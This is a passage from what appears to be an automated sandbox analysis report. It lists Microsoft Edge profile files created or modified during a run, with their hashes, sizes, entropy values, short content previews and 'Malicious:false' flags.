                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLtDN+q2P923oH+TcwtnG2tMsIFUt8doL6IZZmw+doLRKVkwO923oH+TcwtnG2b:iCDIv4Yebn9GFUt8doZ/+d/5LYebn95J
                                                                                                                                                                                                                                                                                    MD5:EBE61D24F89365B0BB6957EF81F6CFB6
                                                                                                                                                                                                                                                                                    SHA1:5D1CAA8B6BA2A894DABCBEA03944C1C8286E3ED2
                                                                                                                                                                                                                                                                                    SHA-256:64377E47BE2F0A4EDFDFDD4ADCAD5021767B8E5F659E3FB3A97CAFFC663833D3
                                                                                                                                                                                                                                                                                    SHA-512:49C19DEBFC3F1D55F567B8B0D4598569057A23EDC69A4C4225BAD1CD60430B140C91968599B65EFE68ADC8A37C0C6A3B81681549AAD5B42738BFAA6443611D49
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.845 17e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-08:47:11.847 17e8 Recovering log #3.2024/12/27-08:47:11.848 17e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6125514362706509
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWBlfMAqNtMc:TLapR+DDNzWjJ0npnyXKUO8+jOpJmL
                                                                                                                                                                                                                                                                                    MD5:A7FE4237E8C45958975611A663CA10ED
                                                                                                                                                                                                                                                                                    SHA1:EAAC00A92C8C7879BA173D7F457351C282BB47F6
                                                                                                                                                                                                                                                                                    SHA-256:9FDD28579CE9A32B6CEB48D9D923F2194AE307020EB9A8CBDF0D4F838813A84A
                                                                                                                                                                                                                                                                                    SHA-512:E6F7EC53531950CB216F9CC6FF2380FD6226B4AF12BC90D93FABB6AFD93DBB126C07F7A9B84DA2E54FA9ECAF6B9447174D7E12CFCC99F5A55C711055DF0768B9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):375520
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.354168944612154
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:VA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:VFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                    MD5:1BFF0065D1347EAA6FB78E0ABD70C1EE
                                                                                                                                                                                                                                                                                    SHA1:5FC47AD5F72066F71ECCCACA25C4C5D0B72E1A5B
                                                                                                                                                                                                                                                                                    SHA-256:5C10923A5947D8274D52885FE729D6AB953C093E46669305EA5DD67C1DD37D09
                                                                                                                                                                                                                                                                                    SHA-512:1221F6440EAC09CF193FB2E301433B11449048714D5F55F4FAF653DE7EBC5B65A4A1CDD77D1D3139330137519CC52CB8CD9D0CCB984922FABFC55EBA42213546
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379780839714515..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):311
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.178660128230674
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iQXt41923oH+Tcwtk2WwnvB2KLlgQYFN+q2P923oH+Tcwtk2WwnvIFUv:iCtFYebkxwnvFLaNFIv4YebkxwnQFUv
                                                                                                                                                                                                                                                                                    MD5:D78A9DEEB052CCE9A7E4BF1F23EF50A8
                                                                                                                                                                                                                                                                                    SHA1:D752DD2F62534401CF6E4F9FA89E6C858926BD37
                                                                                                                                                                                                                                                                                    SHA-256:F25393AE65374A24C0AC785BDF2BD676EB2818BDF35D98E0E39FDCAED5B6D1A0
                                                                                                                                                                                                                                                                                    SHA-512:1B1D735153A880FDA07DB9841F97B595CF5519891F46F90316499BA88F357944907997AF5BC6A7176F7B067483D1F733AC14B5F2FE11C9063632AE42F3B23EC8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:16.929 1c28 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/27-08:47:16.970 1c28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):358860
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.324611490518588
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RT:C1gAg1zfvr
                                                                                                                                                                                                                                                                                    MD5:37C5CC3120F4EA4302421D8FD105D1CD
                                                                                                                                                                                                                                                                                    SHA1:925949E442B7209FFF37A89BD45297195EE8BBCB
                                                                                                                                                                                                                                                                                    SHA-256:DF83EFDA8CA57DD6BC7E482CA931EC627BF3501CF63BD7CE4591063E37F842DC
                                                                                                                                                                                                                                                                                    SHA-512:2D46F2BE4D730BCE2A61F2D21BCD8AD7248CB55934D88B06E2CAA42C710AC8FFCD58D11D9D146DAFC4D5DC24BE40230049CCD7018875C52D5CC3E8D6696C26C1
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111431335742363
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLFKVq2P923oH+Tcwt8aPrqIFUt8doLFKgZmw+doLvIkwO923oH+Tcwt8amLJ:i9Vv4YebL3FUt8d9g/+duI5LYebQJ
                                                                                                                                                                                                                                                                                    MD5:ED722B7E2A37DEA2A8C64F8BD4EC25B8
                                                                                                                                                                                                                                                                                    SHA1:83902A6822BBD1A5992A49FF5A0EE165143913B9
                                                                                                                                                                                                                                                                                    SHA-256:F7CCC7B3C2BBD84CCA8191D79A986916DC864205FA45C7C6ADF644716B451C93
                                                                                                                                                                                                                                                                                    SHA-512:F44EA046ADD082FD6D90626AD2A418D1E445848B1BC24E7BDD5A8979008EFDC104759D0C914BDC9791D8BD90BFEF347F10400F06B000392922639F5197D36763
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.800 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-08:47:11.800 440 Recovering log #3.2024/12/27-08:47:11.801 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111431335742363
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLFKVq2P923oH+Tcwt8aPrqIFUt8doLFKgZmw+doLvIkwO923oH+Tcwt8amLJ:i9Vv4YebL3FUt8d9g/+duI5LYebQJ
                                                                                                                                                                                                                                                                                    MD5:ED722B7E2A37DEA2A8C64F8BD4EC25B8
                                                                                                                                                                                                                                                                                    SHA1:83902A6822BBD1A5992A49FF5A0EE165143913B9
                                                                                                                                                                                                                                                                                    SHA-256:F7CCC7B3C2BBD84CCA8191D79A986916DC864205FA45C7C6ADF644716B451C93
                                                                                                                                                                                                                                                                                    SHA-512:F44EA046ADD082FD6D90626AD2A418D1E445848B1BC24E7BDD5A8979008EFDC104759D0C914BDC9791D8BD90BFEF347F10400F06B000392922639F5197D36763
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.800 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-08:47:11.800 440 Recovering log #3.2024/12/27-08:47:11.801 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.159441589454448
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLdKVq2P923oH+Tcwt865IFUt8doLcwgZmw+doLcwIkwO923oH+Tcwt86+ULJ:itVv4Yeb/WFUt8dJwg/+dJwI5LYeb/+e
                                                                                                                                                                                                                                                                                    MD5:2EEC3A2C5A9FAE2FE877BD4948233C15
                                                                                                                                                                                                                                                                                    SHA1:1FCFB62468900C8572D186FA70241E9CD3816E5D
                                                                                                                                                                                                                                                                                    SHA-256:34C61D38C45F8D482EDE5C2373D334B0082EE7D60AAB4C517D3C8A8139AC2597
                                                                                                                                                                                                                                                                                    SHA-512:7E097FB80561C15F44589FF9E3D55823ABFE51828E8C15A0C8D4AD82F57A9CB5B2374D2EFC367FAD777954CF09B0F158AC06F138B1F4A9E1BBD5CF6A9CF6D15B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.844 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-08:47:11.845 440 Recovering log #3.2024/12/27-08:47:11.845 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.159441589454448
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLdKVq2P923oH+Tcwt865IFUt8doLcwgZmw+doLcwIkwO923oH+Tcwt86+ULJ:itVv4Yeb/WFUt8dJwg/+dJwI5LYeb/+e
                                                                                                                                                                                                                                                                                    MD5:2EEC3A2C5A9FAE2FE877BD4948233C15
                                                                                                                                                                                                                                                                                    SHA1:1FCFB62468900C8572D186FA70241E9CD3816E5D
                                                                                                                                                                                                                                                                                    SHA-256:34C61D38C45F8D482EDE5C2373D334B0082EE7D60AAB4C517D3C8A8139AC2597
                                                                                                                                                                                                                                                                                    SHA-512:7E097FB80561C15F44589FF9E3D55823ABFE51828E8C15A0C8D4AD82F57A9CB5B2374D2EFC367FAD777954CF09B0F158AC06F138B1F4A9E1BBD5CF6A9CF6D15B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.844 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-08:47:11.845 440 Recovering log #3.2024/12/27-08:47:11.845 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1254
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                    MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                    SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                    SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                    SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.205795244619366
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ilq2P923oH+Tcwt8NIFUt8drkXZmw+drkFkwO923oH+Tcwt8+eLJ:ilv4YebpFUt8dE/+dk5LYebqJ
                                                                                                                                                                                                                                                                                    MD5:7316F947CDBEDD12D77803E487C63220
                                                                                                                                                                                                                                                                                    SHA1:B78598745E0F91B9983E9E0152A8C218D28AA23F
                                                                                                                                                                                                                                                                                    SHA-256:944D5A03251CE88B354F2288935DA90B76978FFA45B55508BD8B951ADDB1CCDD
                                                                                                                                                                                                                                                                                    SHA-512:8F903F766D2D942179A4E392637F6DC37F7E7008E50981F1A6D924ED4DA1AE6AF1A2F3110CBFFC0EF0A82B27A5613D2EF1F330EAA0ACCAA6D7DDC4E0DC1C94E2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.551 1b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-08:47:12.555 1b90 Recovering log #3.2024/12/27-08:47:12.555 1b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.205795244619366
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ilq2P923oH+Tcwt8NIFUt8drkXZmw+drkFkwO923oH+Tcwt8+eLJ:ilv4YebpFUt8dE/+dk5LYebqJ
                                                                                                                                                                                                                                                                                    MD5:7316F947CDBEDD12D77803E487C63220
                                                                                                                                                                                                                                                                                    SHA1:B78598745E0F91B9983E9E0152A8C218D28AA23F
                                                                                                                                                                                                                                                                                    SHA-256:944D5A03251CE88B354F2288935DA90B76978FFA45B55508BD8B951ADDB1CCDD
                                                                                                                                                                                                                                                                                    SHA-512:8F903F766D2D942179A4E392637F6DC37F7E7008E50981F1A6D924ED4DA1AE6AF1A2F3110CBFFC0EF0A82B27A5613D2EF1F330EAA0ACCAA6D7DDC4E0DC1C94E2
                                                                                                                                                                                                                                                                                    Malicious:false
